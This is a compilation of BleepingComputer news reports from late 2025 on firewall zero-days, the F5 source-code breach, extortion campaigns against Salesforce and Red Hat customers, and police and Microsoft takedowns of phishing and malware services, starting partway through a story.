G0njxa told BleepingComputer that the Tor onion sites for the malware operation are also offline but do not currently have a police seizure banner, so it is unclear who exactly is behind the disruption.

Multiple researchers who have spoken to BleepingComputer believe this disruption could be related to an upcoming announcement from Operation Endgame, an ongoing law enforcement action targeting malware-as-a-service operations.

Operation Endgame has been behind numerous disruptions since it launched, including against ransomware infrastructure, and the AVCheck site, SmokeLoader, DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC malware operations.

The Operation Endgame website currently has a timer stating that new action will be disclosed on Thursday.

BleepingComputer contacted the German police, Europol, and the FBI, but has not received a reply at this time.

bleepingcomputer.com
By Sergiu Gatlan
November 7, 2025

Cisco warned this week that two vulnerabilities, which have been used in zero-day attacks, are now being exploited to force ASA and FTD firewalls into reboot loops.

The tech giant released security updates on September 25 to address the two security flaws, stating that CVE-2025-20362 enables remote threat actors to access restricted URL endpoints without authentication, while CVE-2025-20333 allows authenticated attackers to gain remote code execution on vulnerable devices.

When chained, these vulnerabilities allow remote, unauthenticated attackers to gain complete control over unpatched systems.

The same day, CISA issued an emergency directive ordering U.S. federal agencies to secure their Cisco firewall devices against attacks using this exploit chain within 24 hours. CISA also mandated them to disconnect ASA devices reaching their end of support (EoS) from federal organization networks.

Threat monitoring service Shadowserver is currently tracking over 34,000 internet-exposed ASA and FTD instances vulnerable to CVE-2025-20333 and CVE-2025-20362 attacks, down from the nearly 50,000 unpatched firewalls it spotted in September.

Now exploited in DoS attacks
"Cisco previously disclosed new vulnerabilities in certain Cisco ASA 5500-X devices running Cisco Secure Firewall ASA software with VPN web services enabled, discovered in collaboration with several government agencies. We attributed these attacks to the same state-sponsored group behind the 2024 ArcaneDoor campaign and urged customers to apply the available software fixes," a Cisco spokesperson told BleepingComputer this week.

"On November 5, 2025, Cisco became aware of a new attack variant targeting devices running Cisco Secure ASA Software or Cisco Secure FTD Software releases affected by the same vulnerabilities. This attack can cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions."

CISA and Cisco linked the attacks to the ArcaneDoor campaign, which exploited two other Cisco firewall zero-day bugs (CVE-2024-20353 and CVE-2024-20359) to breach government networks worldwide starting in November 2023. The UAT4356 threat group (tracked as STORM-1849 by Microsoft) behind the ArcaneDoor attacks deployed previously unknown Line Dancer in-memory shellcode loader and Line Runner backdoor malware to maintain persistence on compromised systems.

On September 25, Cisco fixed a third critical vulnerability (CVE-2025-20363) in its Cisco IOS and firewall software, which can allow unauthenticated threat actors to execute arbitrary code remotely. However, it didn't directly link it to the attacks exploiting CVE-2025-20362 and CVE-2025-20333, saying that its Product Security Incident Response Team was "not aware of any public announcements or malicious use of the vulnerability."

Since then, attackers have started exploiting another recently patched RCE vulnerability (CVE-2025-20352) in Cisco networking devices to deploy rootkit malware on unprotected Linux boxes.

More recently, on Thursday, Cisco released security updates to patch critical security flaws in its Contact Center software, which could enable attackers to bypass authentication (CVE-2025-20358) and execute commands with root privileges (CVE-2025-20354).

"We strongly recommend all customers upgrade to the software fixes outlined in our security advisories," Cisco added on Thursday.

bleepingcomputer.com
By Bill Toulas
October 15, 2025

U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code.

The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products.

BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide.

No supply-chain risk
It’s unclear how long the hackers maintained access, but the company confirmed that they stole source code, vulnerability data, and some configuration and implementation details for a limited number of customers.

"Through this access, certain files were exfiltrated, some of which contained certain portions of the Company's BIG-IP source code and information about undisclosed vulnerabilities that it was working on in BIG-IP," the company states.

Despite this critical exposure of undisclosed flaws, F5 says there's no evidence that the attackers leveraged the information in actual attacks, such as exploiting the undisclosed flaw against systems. The company also states that it has not seen evidence that the private information has been disclosed.

F5 claims that the threat actors' access to the BIG-IP environment did not compromise its software supply chain or result in any suspicious code modifications.

This includes its platforms that contain customer data, such as its CRM, financial, support case management, or iHealth systems. Furthermore, other products and platforms managed by the company are not compromised, including NGINX, F5 Distributed Cloud Services, or Silverline systems' source code.

Response to the breach
After discovering the intrusion, F5 took remediation action by tightening access to its systems, and improving its overall threat monitoring, detection, and response capabilities:

Rotated credentials and strengthened access controls across our systems.
Deployed improved inventory and patch management automation, as well as additional tooling to better monitor, detect, and respond to threats.
Implemented enhancements to our network security architecture.
Hardened our product development environment, including strengthening security controls and monitoring of all software development platforms.
Additionally, the company also focuses on the security of its products through source code reviews and security assessements with support from NCC Group and IOActive.

NCC Group's assessment covered security reviews of critical software components in BIG-IP and portions of the development pipeline in an effort that involved 76 consultants.

IOActive's expertise was called in after the security breach and the engagement is still in progress. The results so far show no evidence of the threat actor introducing vulnerablities in critical F5 software source code or the software development build pipeline.

Customers should take action
F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance.

To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.

Despite any evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

F5 confirmed that today's updates address the potential impact stemming from the stolen undisclosed vulnerabilities.

Furthermore, F5 support makes available a threat hunting guide for customers to improve detection and monitoring in their environment.

New best practices for hardening F5 systems now include automated checks to the F5 iHealth Diagnostic Tool, which can now flag security risks, vulnerabilities, prioritize actions, and provide remediation guidance.

Another recommendation is to enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts.

"Our global support team is available to assist. You can open a MyF5 support case or contact F5 support directly for help updating your BIG-IP software, implementing any of these steps, or to address any questions you may have" - F5

The company added that it has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms, including CrowdStrike and Mandiant.

On Monday, F5 announced that it rotated the cryptographic certcertificates and keys used for signing its digital products. The change affects installing BIG-IP and BIG-IQ TMOS software images while ISO image signature verification is enabled, and installing BIG-IP F5OS tenant images on host systems running F5OS.

Additional guidance for F5 customers comes from UK's National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

Both agencies recommmend identifying all F5 products (hardware, software, and virtualized) and making sure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should make compromise assessment.

F5 notes that it delayed the public disclosure of the incident at the U.S. government's request, presumably to allow enough time to secure critical systems.

"On September 12, 2025, the U.S. Department of Justice determined that a delay in public disclosure was warranted pursuant to Item 1.05(c) of Form 8-K. F5 is now filing this report in a timely manner," explains F5.

F5 states that the incident has no material impact on its operations. All services remain available and are considered safe, based on the latest available evidence.

BleepingComputer has contacted F5 to request more details about the incident, and we will update this post when we receive a response.

Picus Blue Report 2025

bleepingcomputer.com
By Bill Toulas
October 11, 2025

Spanish Guardia Civil have dismantled the “GXC Team” cybercrime operation and arrested its alleged leader, a 25-year-old Brazilian known as “GoogleXcoder.”

The GXC Team operated a crime-as-a-service (CaaS) platform offering AI-powered phishing kits, Android malware, and voice-scam tools via Telegram and a Russian-speaking hacker forum.

“The Civil Guard has dismantled one of the most active criminal organizations in the field of phishing in Spain, with the arrest of a 25-year-old Brazilian young man considered the main provider of tools for the massive theft of credentials in the Spanish-speaking environment,” announced Guardia Civil.

Group-IB has been tracking the operation and says that GXC Team was targeting banks, transport, and e-commerce entities in Spain, Slovakia, the UK, the US, and Brazil.

The phishing kits replicated the websites of tens of Spanish and international institutions, and powered at least 250 phishing sites.

The threat group also developed at least nine Android malware strains that intercepted SMS and one-time passwords (OTPs), useful for hijacking accounts and validating fraudulent transactions.

GXC Team also offered complete technical support and campaign customization services to its clients, acting as a pro-grade and high-yielding crime platform.

A police operation conducted on May 20, involved coordinated raids across Cantabria, Valladolid, Zaragoza, Barcelona, Palma de Mallorca, San Fernando, and La Línea de la Concepción.

During these actions, the authorities seized electronic devices containing phishing kit source code, communications with clients, and financial records.

Law enforcement agents recovered cryptocurrency stolen from victims and shut down Telegram channels used to promote the scams. One of these channels was named “Steal everything from grandmothers.”

The authorities stated that the nationwide raids were made possible thanks to the analysis of the seized devices and cryptocurrency transactions of GoogleXcoder, who was arrested more than a year ago.

“The forensic analysis of the seized devices, as well as the cryptocurrency transactions, which lasted for more than a year due to their complexity, made it possible to reconstruct the entire criminal network, managing to identify six people directly related to the use of these services,” explained Guardia Civil.

The investigation into the GXC Team is still ongoing, and Spanish authorities have mentioned the possibility of further actions leading to the arrest of more members of the cybercrime ring.

bleepingcomputer.com By Sergiu Gatlan
October 3, 2025

An extortion group has launched a new data leak site to publicly extort dozens of companies impacted by a wave of Salesforce breaches, leaking samples of data stolen in the attacks.

The threat actors responsible for these attacks claim to be part of the ShinyHunters, Scattered Spider, and Lapsus$ groups, collectively referring to themselves as "Scattered Lapsus$ Hunters."

Today, they launched a new data leak site containing 39 companies impacted by the attacks. Each entry includes samples of data allegedly stolen from victims' Salesforce instances, and warns the victims to reach out to "prevent public disclosure" of their data before the October 10 deadline is reached.

The companies being extorted on the data leak site include well-known brands and organizations, including FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, Instacart, Cartier, Adidas, Sake Fifth Avenue, Air France & KLM, Transunion, HBO MAX, UPS, Chanel, and IKEA.

"All of them have been contacted long ago, they saw the email because I saw them download the samples multiple times. Most of them chose to not disclose and ignore," ShinyHunters told BleepingComputer.

"We highly advise you proceed into the right decision, your organisation can prevent the release of this data, regain control over the situation and all operations remain stable as always. We highly recommend a decision-maker to get involved as we are presenting a clear and mutually beneficial opportunity to resolve this matter," they warned on the leak site.

The threat actors also added a separate entry requesting that Salesforce pay a ransom to prevent all impacted customers' data (approximately 1 billion records containing personal information) from being leaked.

"Should you comply, we will withdraw from any active or pending negotiation indiviually from your customers. Your customers will not be attacked again nor will they face a ransom from us again, should you pay," they added.

The extortion group also threatened the company, stating that it would help law firms pursue civil and commercial lawsuits against Salesforce following the data breaches and warned that the company had also failed to protect customers' data as required by the European General Data Protection Regulation (GDPR).

bleepingcomputer.com By Lawrence Abrams
October 2, 2025 02:15 AM 0

An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.

An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.

This data allegedly includes approximately 800 Customer Engagement Reports (CERs), which can contain sensitive information about a customer's network and platforms.

A CER is a consulting document prepared for clients that often contains infrastructure details, configuration data, authentication tokens, and other information that could be abused to breach customer networks.

Red Hat confirmed that it suffered a security incident related to its consulting business, but would not verify any of the attacker's claims regarding the stolen GitHub repositories and customer CERs.

"Red Hat is aware of reports regarding a security incident related to our consulting business and we have initiated necessary remediation steps," Red Hat told BleepingComputer.

"The security and integrity of our systems and the data entrusted to us are our highest priority. At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain."

While Red Hat did not respond to any further questions about the breach, the hackers told BleepingComputer that the intrusion occurred approximately two weeks ago.

They allegedly found authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure.

The hacking group also published a complete directory listing of the allegedly stolen GitHub repositories and a list of CERs from 2020 through 2025 on Telegram.

The directory listing of CERs include a wide range of sectors and well known organizations such as Bank of America, T-Mobile, AT&T, Fidelity, Kaiser, Mayo Clinic, Walmart, Costco, the U.S. Navy’s Naval Surface Warfare Center, Federal Aviation Administration, the House of Representatives, and many others.

The hackers stated that they attempted to contact Red Hat with an extortion demand but received no response other than a templated reply instructing them to submit a vulnerability report to their security team.

According to them, the created ticket was repeatedly assigned to additional people, including Red Hat's legal and security staff members.

BleepingComputer sent Red Hat additional questions, and we will update this story if we receive more information.

The same group also claimed responsibility for briefly defacing Nintendo’s topic page last week to include contact information and links to their Telegram channel

bleepingcomputer.com
by Sergiu Gatlan
September 23, 2025

SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.

SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.

"SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices," the company said in a Monday advisory.

"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version."

The update follows a July report from researchers at the Google Threat Intelligence Group (GTIG), who observed a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices that will reach end-of-support next week, on October 1, 2025.

OVERSTEP is a user-mode rootkit that enables attackers to maintain persistent access by using hidden malicious components and establishing a reverse shell on compromised devices. The malware steals sensitive files, including the persist.database and certificate files, providing hackers with access to credentials, OTP seeds, and certificates that further enable persistence.

While the researchers have not determined the goal behind UNC6148's attacks, they did find "noteworthy overlaps" with Abyss-related ransomware incidents.

For instance, in late 2023, Truesec investigated an Abyss ransomware incident in which hackers installed a web shell on an SMA appliance, enabling them to maintain persistence despite firmware updates. In March 2024, InfoGuard AG incident responder Stephan Berger reported a similar SMA device compromise that also resulted in the deployment of Abyss malware.

"The threat intelligence report from Google Threat Intelligence Group (GTIG) highlights potential risk of using older versions of SMA100 firmware," SonicWall added on Monday, urging admins to implement the security measures outlined in this July advisory.

Last week, SonicWall warned customers to reset credentials after their firewall configuration backup files were exposed in brute-force attacks targeting the API service for cloud backup.

In August, the company also dismissed claims that the Akira ransomware gang was hacking Gen 7 firewalls using a potential zero-day exploit, clarifying that the issue was tied to a critical vulnerability (CVE-2024-40766) that was patched in November 2024.

The Australian Cyber Security Center (ACSC) and cybersecurity firm Rapid7 later confirmed that the Akira gang is exploiting this vulnerability to target unpatched SonicWall devices.

bleepingcomputer.com
Microsoft and Cloudflare have disrupted a massive Phishing-as-a-Service (PhaaS) operation, known as RaccoonO365, that helped cybercriminals steal thousands of Microsoft 365 credentials.

In early September 2025, in coordination with Cloudflare's Cloudforce One and Trust and Safety teams, Microsoft's Digital Crimes Unit (DCU) disrupted the cybercrime operation by seizing 338 websites and Worker accounts linked to RaccoonO365.

The cybercrime group behind this service (also tracked by Microsoft as Storm-2246) has stolen at least 5,000 Microsoft credentials from 94 countries since at least July 2024, using RaccoonO365 phishing kits that bundled CAPTCHA pages and anti-bot techniques to appear legitimate and evade analysis.

For instance, a large-scale RaccoonO365 tax-themed phishing campaign targeted over 2,300 organizations in the United States in April 2025, but these phishing kits have also been deployed in attacks against more than 20 U.S. healthcare organizations.

The credentials, cookies, and other data stolen from victims' OneDrive, SharePoint, and email accounts were later employed in financial fraud attempts, extortion attacks, or as initial access to other victims' systems.

"This puts public safety at risk, as RaccoonO365 phishing emails are often a precursor to malware and ransomware, which have severe consequences for hospitals," said Steven Masada, Assistant General Counsel for Microsoft's Digital Crimes Unit.

"In these attacks, patient services are delayed, critical care is postponed or canceled, lab results are compromised, and sensitive data is breached, causing major financial losses and directly impacting patients."

RaccoonO365 has been renting subscription-based phishing kits through a private Telegram channel, which had over 840 members as of August 25, 2025. The prices ranged from $355 for a 30-day plan to $999 for a 90-day subscription, all paid in USDT (TRC20, BEP20, Polygon) or Bitcoin (BTC) cryptocurrency.
​Microsoft estimated that the group has received at least $100,000 in cryptocurrency payments so far, suggesting there are approximately 100 to 200 subscriptions; however, the actual number of subscriptions sold is likely much higher.

During its investigation, the Microsoft DCU also found that the leader of RaccoonO365 is Joshua Ogundipe, who lives in Nigeria.

Cloudflare also believes that RaccoonO365 also collaborates with Russian-speaking cybercriminals, given the use of Russian in its Telegram bot's name.

"Based on Microsoft's analysis, Ogundipe has a background in computer programming and is believed to have authored the majority of the code," Masada added.

"An operational security lapse by the threat actors in which they inadvertently revealed a secret cryptocurrency wallet helped the DCU's attribution and understanding of their operations. A criminal referral for Ogundipe has been sent to international law enforcement."

In May, Microsoft also seized 2,300 domains in a coordinated disruption action targeting the Lumma malware-as-a-service (MaaS) information stealer.